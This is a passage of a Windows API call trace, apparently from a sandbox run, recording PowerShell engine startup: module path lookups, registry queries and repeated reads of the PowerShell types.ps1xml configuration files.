lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.913] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0028.913] GetLastError () returned 0x3 [0028.915] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0xd2630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0028.915] GetLastError () returned 0x3 [0028.915] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e880 | out: phkResult=0x24e880*=0x328) returned 0x0 [0028.915] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e8c4, lpData=0x0, lpcbData=0x24e8c0*=0x0 | out: lpType=0x24e8c4*=0x2, lpData=0x0, lpcbData=0x24e8c0*=0x6c) returned 0x0 [0028.916] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e8c4, lpData=0xd2630, lpcbData=0x24e8c0*=0x6c | out: lpType=0x24e8c4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24e8c0*=0x6c) returned 0x0 [0028.916] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0xd2630, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0028.916] GetLastError () returned 0x3 [0028.916] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0xd2630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0028.917] GetLastError () returned 0x3 [0028.917] RegCloseKey (hKey=0x328) returned 0x0 [0028.917] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0xd2630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0028.917] GetLastError () returned 0x3 [0028.917] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e880 | out: phkResult=0x24e880*=0x328) returned 0x0 [0028.917] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e8c4, lpData=0x0, lpcbData=0x24e8c0*=0x0 | out: lpType=0x24e8c4*=0x0, lpData=0x0, lpcbData=0x24e8c0*=0x0) returned 0x2 [0028.918] RegCloseKey (hKey=0x328) returned 0x0 [0028.957] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xd2630 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0028.957] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x24e3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0028.957] GetLastError () returned 0x3f0 [0028.958] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0028.958] GetLastError () returned 0x3f0 [0028.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.964] GetLastError () returned 0xcb [0028.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.965] GetLastError () returned 0xcb [0028.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.970] GetLastError () returned 0xcb [0028.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.970] GetLastError () returned 0xcb [0028.974] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e800 | out: phkResult=0x24e800*=0x330) returned 0x0 [0028.975] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e868, lpData=0x0, lpcbData=0x24e864*=0x0 | out: lpType=0x24e868*=0x1, lpData=0x0, lpcbData=0x24e864*=0x74) returned 0x0 [0028.975] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e848, lpData=0x0, lpcbData=0x24e844*=0x0 | out: lpType=0x24e848*=0x1, lpData=0x0, lpcbData=0x24e844*=0x74) returned 0x0 [0028.975] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x24e848, lpData=0xd2630, lpcbData=0x24e844*=0x74 | out: lpType=0x24e848*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24e844*=0x74) returned 0x0 [0028.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0028.976] GetLastError () returned 0xcb [0028.976] SetErrorMode (uMode=0x1) returned 0x1 [0028.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24e848 | out: lpFileInformation=0x24e848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0028.976] GetLastError () returned 0xcb [0028.976] SetErrorMode (uMode=0x1) returned 0x1 [0028.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0028.978] GetLastError () returned 0xcb [0028.978] SetErrorMode (uMode=0x1) returned 0x1 [0028.978] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e83c | out: lpFileInformation=0x24e83c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0028.979] GetLastError () returned 0xcb [0028.979] SetErrorMode (uMode=0x1) returned 0x1 [0028.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e3bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0028.981] GetLastError () returned 0xcb [0028.981] SetErrorMode (uMode=0x1) returned 0x1 [0028.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e83c | out: lpFileInformation=0x24e83c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0028.982] GetLastError () returned 0xcb [0028.982] SetErrorMode (uMode=0x1) returned 0x1 [0028.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.987] GetLastError () returned 0xcb [0028.988] GetACP () returned 0x4e4 [0028.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e24c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0028.997] GetLastError () returned 0x0 [0028.997] SetErrorMode (uMode=0x1) returned 0x1 [0028.999] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0028.999] GetLastError () returned 0x0 [0029.000] GetFileType (hFile=0x334) returned 0x1 [0029.000] SetErrorMode (uMode=0x1) returned 0x1 [0029.000] GetFileType (hFile=0x334) returned 0x1 [0029.001] ReadFile (in: hFile=0x334, lpBuffer=0x2086668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2086668*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.002] GetLastError () returned 0x0 [0029.003] ReadFile (in: hFile=0x334, lpBuffer=0x2086668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2086668*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.003] GetLastError () returned 0x0 [0029.003] ReadFile (in: hFile=0x334, lpBuffer=0x2086668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2086668*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.003] GetLastError () returned 0x0 [0029.004] ReadFile (in: hFile=0x334, lpBuffer=0x2086668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2086668*, lpNumberOfBytesRead=0x24e7b4*=0xcf3, lpOverlapped=0x0) returned 1 [0029.004] GetLastError () returned 0x0 [0029.004] ReadFile (in: hFile=0x334, lpBuffer=0x2085afb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2085afb*, lpNumberOfBytesRead=0x24e7b4*=0x0, lpOverlapped=0x0) returned 1 [0029.004] GetLastError () returned 0x0 [0029.004] ReadFile (in: hFile=0x334, lpBuffer=0x2086668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2086668*, lpNumberOfBytesRead=0x24e7b4*=0x0, lpOverlapped=0x0) returned 1 [0029.004] GetLastError () returned 0x0 [0029.004] CloseHandle (hObject=0x334) returned 1 [0029.004] GetLastError () returned 0x0 [0029.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e314, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0029.005] GetLastError () returned 0x0 [0029.005] SetErrorMode (uMode=0x1) returned 0x1 [0029.005] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20979dc | out: lpFileInformation=0x20979dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0029.005] GetLastError () returned 0x0 [0029.005] SetErrorMode (uMode=0x1) returned 0x1 [0029.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0029.007] GetLastError () returned 0x0 [0029.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e738 | out: phkResult=0x24e738*=0x334) returned 0x0 [0029.007] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e780, lpData=0x0, lpcbData=0x24e77c*=0x0 | out: lpType=0x24e780*=0x1, lpData=0x0, lpcbData=0x24e77c*=0x56) returned 0x0 [0029.007] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e780, lpData=0xd2630, lpcbData=0x24e77c*=0x56 | out: lpType=0x24e780*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e77c*=0x56) returned 0x0 [0029.008] RegCloseKey (hKey=0x334) returned 0x0 [0029.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0029.008] GetLastError () returned 0x0 [0029.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e274, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0029.008] GetLastError () returned 0x0 [0029.069] GetSystemInfo (in: lpSystemInfo=0x24deb8 | out: lpSystemInfo=0x24deb8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0029.071] VirtualQuery (in: lpAddress=0x24d674, lpBuffer=0x24e674, dwLength=0x1c | out: lpBuffer=0x24e674*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24e24c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0029.089] GetLastError () returned 0x0 [0029.089] SetErrorMode (uMode=0x1) returned 0x1 [0029.090] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0029.090] GetLastError () returned 0x0 [0029.090] GetFileType (hFile=0x334) returned 0x1 [0029.090] SetErrorMode (uMode=0x1) returned 0x1 [0029.090] GetFileType (hFile=0x334) returned 0x1 [0029.090] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.092] GetLastError () returned 0x0 [0029.092] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.092] GetLastError () returned 0x0 [0029.093] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.093] GetLastError () returned 0x0 [0029.093] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.093] GetLastError () returned 0x0 [0029.093] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.093] GetLastError () returned 0x0 [0029.094] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.094] GetLastError () returned 0x0 [0029.094] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.094] GetLastError () returned 0x0 [0029.094] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.094] GetLastError () returned 0x0 [0029.094] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.094] GetLastError () returned 0x0 [0029.095] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.095] GetLastError () returned 0x0 [0029.095] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.095] GetLastError () returned 0x0 [0029.096] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.096] GetLastError () returned 0x0 [0029.096] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.096] GetLastError () returned 0x0 [0029.096] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.096] GetLastError () returned 0x0 [0029.096] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.096] GetLastError () returned 0x0 [0029.097] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.097] GetLastError () returned 0x0 [0029.097] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.097] GetLastError () returned 0x0 [0029.099] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.099] GetLastError () returned 0x0 [0029.099] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.099] GetLastError () returned 0x0 [0029.099] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.099] GetLastError () returned 0x0 [0029.099] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.099] GetLastError () returned 0x0 [0029.099] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.099] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.100] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.100] GetLastError () returned 0x0 [0029.101] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.101] GetLastError () returned 0x0 [0029.101] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.101] GetLastError () returned 0x0 [0029.101] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.101] GetLastError () returned 0x0 [0029.101] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.101] GetLastError () returned 0x0 [0029.101] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, lpOverlapped=0x0 | out: lpBuffer=0x20cbdf8*, lpNumberOfBytesRead=0x24e7b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.101] GetLastError () returned 0x0 [0029.105] ReadFile (in: hFile=0x334, lpBuffer=0x20cbdf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e7b4, 